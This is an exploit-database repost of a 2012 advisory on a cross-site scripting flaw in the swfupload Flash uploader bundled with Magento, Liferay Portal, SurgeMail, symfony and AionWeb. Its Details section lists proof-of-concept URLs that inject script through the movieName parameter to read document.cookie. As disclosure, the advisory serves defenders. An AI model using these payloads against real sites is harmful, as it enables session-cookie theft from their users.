Advertisement






AionWeb, Magento, Liferay Portal, SurgeMail, symfony XSS vulnerability

CVE Category Price Severity
N/A CWE-79 Not specified High
Author Risk Exploitation Type Date
Not specified Critical Remote 2012-11-16
CPE
cpe:cpe:/a:magento:magento
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2012110108

Below is a copy:

I will draw your attention to XSS vulnerability in other web applications
with swfupload. Earlier I've wrote about swfupload in Dotclear, XenForo,
InstantCMS, AionWeb, Dolphin and that this hole is available in many other
web applications.

In previous letter I've wrote concerning web applications with swfupload.swf
(which is for Flash Player 10). And now I'll write about web applications
with swfupload_f9.swf (which is for Flash Player 9). Here is information
about AionWeb, Magento, Liferay Portal (Community Edition and Enterprise
Edition), SurgeMail, symfony - among multiple web applications which are
bundled with swfupload_f9.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of AionWeb, Magento, Liferay Portal
(Community Edition and Enterprise Edition), SurgeMail, symfony. There is no
information that they have fixed this vulnerability in their software (at
that this vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload. But in WordPress and XenForo the swfupload.swf was
fixed, not swfupload_f9.swf and these are different versions of the same
flash application (designed for different versions of Flash Player). Taking
into account current wide spreading of Flash Player 10.x and 11.x, then
developers of these web applications could replace swfupload_f9.swf with new
fixed version of Swfupload.

----------
Details:
----------

XSS (WASC-08):

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/engine/classes/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb contains both versions of flash application (and also version for
Flash Player 8, about which I'll write in the next letter).

Magento:

http://site/cms/themes/cp_themes/default/images/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

SurgeMail contains both versions of flash application (and also version for
Flash Player 8, about which I'll write in the next letter).

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb, Liferay Portal, SurgeMail and symfony contain different versions of
flash application, about which I'll write in the next letter.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum